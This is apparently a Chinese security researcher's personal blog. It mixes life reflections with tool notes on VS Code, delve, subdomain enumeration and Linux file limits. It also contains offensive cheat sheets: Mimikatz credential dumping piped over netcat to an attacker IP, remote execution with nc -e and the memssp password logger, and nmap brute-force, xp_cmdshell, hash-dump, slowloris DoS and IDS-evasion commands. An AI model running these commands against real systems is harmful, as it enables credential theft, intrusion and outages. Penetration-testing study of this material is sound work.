最近一些想法

接触计算机三年,接触安全两年,现在在一个曾经很强大的公司工作。。。。

工资还凑合吧。。   如果业余时间挖洞的话其实生活质量更好  但是时间不够用  好多事情要去做,争取把偶尔玩玩游戏,刷刷论坛的时间也给去掉  ,虽然觉得没有了娱乐的生活很没意思。但是谁叫自己起步低呢。

原来招我来的前辈前一阵离职了,有些伤感,现在的状态是做好日常应该做的,每天有挺多时间研究自己想研究的,感觉挺好,todolist太多…..

感情这个事其实现在看起来特别不适合我,现在处于一个不上不下的状态。。   前一阵喜欢了一个女生,几年没有心动的感觉了,嗯不过还是算了,现在这个状态不适合,等3-5年后再想把。。

关于学习,其实如果单纯的学习还是挺好的,不过感觉工资不是很多要挤出时间来挖洞赚钱,如果不攒钱的话还是很舒适的,人生。。。。

之前觉得公司学到的东西可能不多了,但是而且别人的灌输其实挺想换一家的,因为公司安全方面坑有点多,而且现在这个状态,但是认识了很多有意思的人,俊哥、lv、硕硕、许静姐人都是很不错的,有很多时候真的想骂自己,有这么好的朋友还有这种想法。

要学的太多了,其实不太喜欢折腾,毕竟折腾会浪费很多时间,感情的事顺其自然吧,工作的事是金子早晚会发光,现在还是一心一意让自己成长的更多吧。

英语是个难题,怎么才能更厉害呢,硬啃英文的文章么。。。。

最重要的关于身体,这两天生病了 没有出去跑步,已经坚持了半个月把,最近感觉身体两方面变差了,一方面是有点变胖了这个跑步就能解决,还有就是前一段时间有些过度透支了,每天睡5-6小时?而且特别精神,总说别人有黑眼圈,其实有一天一照镜子发现自己也有了。

坚持撸代码,这玩意十天不写代码就不会写了?

go vscode 坑。。。

好多坑 来不及记下来。。

 

先说vscode  同步插件

settings sync

alt+shift+u  添加gist token  然后 上传插件会在用户得json处生成一个sync.gist

同步得时候同时需要token 和sync.gist

 

 

go 安装delve调试工具  win下得坑。。。

创建文件夹%GOPATH%\src\github.com\derekparker

git clone https://github.com/derekparker/delve.git

go get -u github.com/derekparker/delve/cmd/dlv

Mimikatz 常用

1.记录 Mimikatz输出:
C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.将输出导入到本地文件:
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
3.将输出传输到远程机器:
Attacker执行:
E:\>nc -lvp 4444
Victim执行:
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
192.168.52.1 为Attacker IP

4.通过nc远程执行Mimikatz:
Victim执行:
C:\>nc -lvp 443
Attacker执行:
E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
192.168.52.128 为Victim IP

若管理员有每过几天就改密码的习惯,但是mimikatz抓取到的密码都是老密码

用QuarksPwDump等抓的hash也是老hash,新密码却抓不到的情况下

可以使用以下方法尝试解决

privilege::debug
misc::memssp

记录的结果在c:\windows\system32\mimilsa.log
每次验证都会记录  如 锁屏 等  重启失效

出现如上问题是因为管理一直没注销过,都是直接断开连接,lsass进程里面还吃存放的老的。

也可以直接logoff,但是这样会很明显。

nmap 速查

nmap 使用

Tags: 安全工具

[toc]

重点参数

-sT     TCP扫描
-sS     SYN扫描,速度较快
-sU     UDP扫描
-sP     ping方式扫描
-vv     结果详细输出
-O      操作系统类型的探测
-A      包含了1-10000的端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测
-Pn     不检测主机存活

重点脚本

  1. 脚本分类,–script=类别 这种方式进行比较笼统的扫描
    auth            负责处理鉴权证书(绕开鉴权)的脚本  
    broadcast       在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务  
    brute           提供暴力破解方式,针对常见的应用如http/snmp等  
    default         使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力  
    discovery       对网络进行更多的信息,如SMB枚举、SNMP查询等  
    dos             用于进行拒绝服务攻击  
    exploit         利用已知的漏洞入侵系统  
    external        利用第三方的数据库或资源,例如进行whois解析  
    fuzzer          模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 
    intrusive       入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽  
    malware         探测目标机是否感染了病毒、开启了后门等信息  
    safe            此类与intrusive相反,属于安全性脚本  
    version         负责增强服务与版本扫描(Version Detection)功能的脚本  
    vuln            负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
    
  2. 按应用服务扫描
    1. vnc
    realvnc-auth-bypass     检查vnc bypass
    vnc-auth                检查vnc认证方式
    vnc-info                 获取vnc信息
    
    1. smb

    smb破解

    --script=smb-brute.nse 
    

    smb字典破解

    --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 
    

    查询敏感信息

    nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test
    

    查看系统信息

    nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 
    
    1. mssql

    猜解mssql用户名和密码

    nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd  
    

    xp_cmdshell 执行命令

    nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 
    

    dumphash值

    nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 
    

    4)Mysql

    扫描root空口令

    nmap -p3306 --script=mysql-empty-password.nse 
    

    列出所有mysql用户

    nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4 
    

    Mysql所有脚本应用

    nmap --script=mysql-* 
    
    1. Oracle

    sid扫描

    nmap --script=oracle-sid-brute -p 1521-1560 ip_address
    

    弱口令破解

    nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 
    

脚本延伸

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关  
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync  
nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解  
nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解  
nmap -sU --script snmp-brute 192.168.137.4            snmp破解  
nmap -sV --script=telnet-brute 192.168.137.4          telnet破解  
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn  
nmap --script=http-methods.nse 192.168.137.4 检查http方法  
nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections   
nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

其余参数

  1. 批量扫描
    -iL filename                    从文件中读取待检测的目标,文件中的表示方法支持机名,ip,网段
    -iR hostnum                     随机选取,进行扫描.如果-iR指定为0,则是无休止的扫描
    --exclude host1[, host2]        从扫描任务中需要排除的主机           
    --exculdefile exclude_file      排除文件中的IP,格式和-iL指定扫描文件的格式相同
    
  2. 主机发现
    -sL                     仅仅是显示,扫描的IP数目,不会进行任何扫描
    -sn                     ping扫描,即主机发现
    -Pn                     不检测主机存活
    -PS/PA/PU/PY[portlist]  TCP SYN Ping/TCP ACK Ping/UDP Ping发现
    -PE/PP/PM               使用ICMP echo, timestamp and netmask 请求包发现主机
    -PO[prococol list]      使用IP协议包探测对方主机是否开启   
    -n/-R                   不对IP进行域名反向解析/为所有的IP都进行域名的反响解析
    
  3. 扫描技巧
    -sS/sT/sA/sW/sM                 TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
    -sU                             UDP扫描
    -sN/sF/sX                       TCP Null,FIN,and Xmas扫描
    --scanflags                     自定义TCP包中的flags
    -sI zombie host[:probeport]     Idlescan
    -sY/sZ                          SCTP INIT/COOKIE-ECHO 扫描
    -sO                             使用IP protocol 扫描确定目标机支持的协议类型
    -b “FTP relay host”             使用FTP bounce scan
    
  4. 指定端口和扫描顺序
    -p                      特定的端口 -p80,443 或者 -p1-65535
    -p U:PORT               扫描udp的某个端口, -p U:53
    -F                      快速扫描模式,比默认的扫描端口还少
    -r                      不随机扫描端口,默认是随机扫描的
    --top-ports "number"    扫描开放概率最高的number个端口,出现的概率需要参考nmap-services文件,ubuntu中该文件位于/usr/share/nmap.nmap默认扫前1000个
    --port-ratio "ratio"    扫描指定频率以上的端口
    
  5. 服务版本识别
    -sV                             开放版本探测,可以直接使用-A同时打开操作系统探测和版本探测
    --version-intensity "level"     设置版本扫描强度,强度水平说明了应该使用哪些探测报文。数值越高,服务越有可能被正确识别。默认是7
    --version-light                 打开轻量级模式,为--version-intensity 2的别名
    --version-all                   尝试所有探测,为--version-intensity 9的别名
    --version-trace                 显示出详细的版本侦测过程信息
    
  6. OS识别
    -O              启用操作系统检测,-A来同时启用操作系统检测和版本检测
    --osscan-limit  针对指定的目标进行操作系统检测(至少需确知该主机分别有一个open和closed的端口)
    --osscan-guess  推测操作系统检测结果,当Nmap无法确定所检测的操作系统时,会尽可能地提供最相近的匹配,Nmap默认进行这种匹配
    
  7. 防火墙/IDS躲避和哄骗
    -f; --mtu value                 指定使用分片、指定数据包的MTU.
    -D decoy1,decoy2...             使用诱饵隐蔽扫描ip
    -S IP-ADDRESS                   源地址欺骗
    -e interface                    使用指定的接口
    -g/ --source-port PROTNUM       使用指定源端口  
    --proxies url1,[url2],...       使用HTTP或者SOCKS4的代理 
     
    --data-length NUM               填充随机数据让数据包长度达到NUM
    --ip-options OPTIONS            使用指定的IP选项来发送数据包
    --ttl VALUE                     设置IP time-to-live域
    --spoof-mac ADDR/PREFIX/VEBDOR  MAC地址伪装
    
  8. 输出
    -oN                     将标准输出直接写入指定的文件
    -oX                     输出xml文件
    -oS                     将所有的输出都改为大写
    -oG                     输出便于通过bash或者perl处理的格式,非xml
    -oA BASENAME            可将扫描结果以标准格式、XML格式和Grep格式一次性输出
    -v                      提高输出信息的详细度
    -d level                设置debug级别,最高是9
    --reason                显示端口处于带确认状态的原因
    --open                  只输出端口状态为open的端口
    --packet-trace          显示所有发送或者接收到的数据包
    --iflist                显示路由信息和接口,便于调试
    --log-errors            把日志等级为errors/warings的日志输出
    --append-output         追加到指定的文件
    --resume FILENAME       恢复已停止的扫描
    --stylesheet PATH/URL   设置XSL样式表,转换XML输出
    --webxml                从namp.org得到XML的样式
    --no-sytlesheet         忽略XML声明的XSL样式表

浅谈子域名枚举

之前提到对一家厂商无论渗透测试还是,漏洞挖掘70%工作都是信息收集  而信息收集中子域名的收集又是重中之重

之前有人提到一个收集子域名字典的方法 利用dns历史解析记录等

经过整理了大概400G的解析记录整理出了大字典(1000万)中字典(300万+)小字典(60万+)的字典

接着就是子域名枚举了

本来以为很简单的一件事情,而且安全圈有开源了几个不错的字典比如lijiejie的subDomainsBrute esd等等

结果发现并不理想,当subDomainsBrute加载字典过大的时候会使进程kill掉(这个坑是后来擦发现的,,,)

lijiejie的脚本有些坑,速度也不是特别快而且字典大了会产生错误,还是2.7写的 这我一个用python3的肯定是不爽的

 

开始尝试用lijiejie的思路去写  多进程+gevent协程

大概一天就能跑起来了 ,然后开心的去跑了一下  嗯1000的域名字典很快,结果跑了一个60w的字典发现奇慢无比,其中坑的有gevent的猴子补丁如果打上全局path.all的话多进程Manager数据共享管理器会抛出异常,而且这异常在windows不会出现的,那么为了多进程只好把猴子补丁关掉,而猴子补丁关掉的话,gevent协程做dns查询中协程就会失败,导致是使用多进程去跑子域名根本和协程一点关系没有,到了这里差不多搞了一周了,整个人都已经奔溃了,各种异常各种坑,说到底还是python2.7带过来的坑

 

 

柳暗花明又一村——————–

发现了在pthon3.4引入了一个新的标准库asyncio  取代gevent绰绰有余,而且速度很快,在最终的demo里如果不限制并发量的话公司的机器能跑满带宽达到3.4m/s的速度,于是乎想了一个多进程+asyncio异步的方法来实现

后来测试总是出现一个 broken  pipe的问题   查了一下谷歌说是因为管理共享数据需要加锁的原因,但是搞来搞去还是没搞掉异常,最后使用单进程+asyncio异步来实现

从敲定这个结构到完成踩了不少坑

 

1  在生成异步循环体的时候会加载大量的内存导致进程崩溃,这也是subDomainsBrute会产生kill的原因,解决方法是在生成循环之前把扫描列表切割程子字典(这块很坑,python加载一个88m字典只占用了我3%的内存,但是如果把这88m字典变成循环任务的话 会导致内存崩溃   这里具体多少内存我是不知道了  但是我24G内存的机器是满了。。。。。)

 

2 在dns查询的时候有好多time out的异常 这里如果写成获取异常重试是解决不了问题的(发现这个问题是在跑了几次发现结果不一样发现的  巨坑)最后把error的扔到一个列表中等所有队列跑完了在进行递归查询

3 还有小坑 貌似都忘了 比如Linux、 windows有socket连接数限制啊  linux默认是1024啊

 

下面的坑留给未来

 

有好多域名解析到一个nginx反向代理服务器 然后再由反向代理服务器根据域名解析到对应ip  这里如果数量多的话 影响子域名泛解析判断

再有就是像*.taobao.com这样域名  可能会有很多商户域名,后续都是有待修改的。。。。

 

linux修改open files数

ulimit -a 查看open  files数

 

core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 31403
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 65535
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 10240
cpu time (seconds, -t) unlimited
max user processes (-u) 31403
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited

 

修改:
1.修改file-max

# echo  6553560 > /proc/sys/fs/file-max  //sysctl -w "fs.file-max=34166",前面2种重启机器后会恢复为默认值
或
# vim /etc/sysctl.conf, 加入以下内容,重启生效
fs.file-max = 6553560

2.修改ulimit的open file,系统默认的ulimit对文件打开数量的限制是1024

# ulimit -HSn 102400  //这只是在当前终端有效,退出之后,open files又变为默认值。当然也可以写到/etc/profile中,因为每次登录终端时,都会自动执行/etc/profile
或
# vim /etc/security/limits.conf  //加入以下配置,重启即可生效
* soft nofile 65535 
* hard nofile 65535

python 协程+多进程的坑。。。。

在协程中大家都会使用猴子补丁

 

 

from gevent import monkey; monkey.patch_all()

这本身没什么问题
但是如果想要变成多进程+协程这种写法
在多个子进程共享数据的时候如果用到

multiprocessing.Manager() 来管理字典 列表或者其他类型的共享数据的时候 在linux会
触发异常 在win下不触发异常也会导致变慢。。。

 

 

这里只能先暂时注释掉猴子补丁了。。。。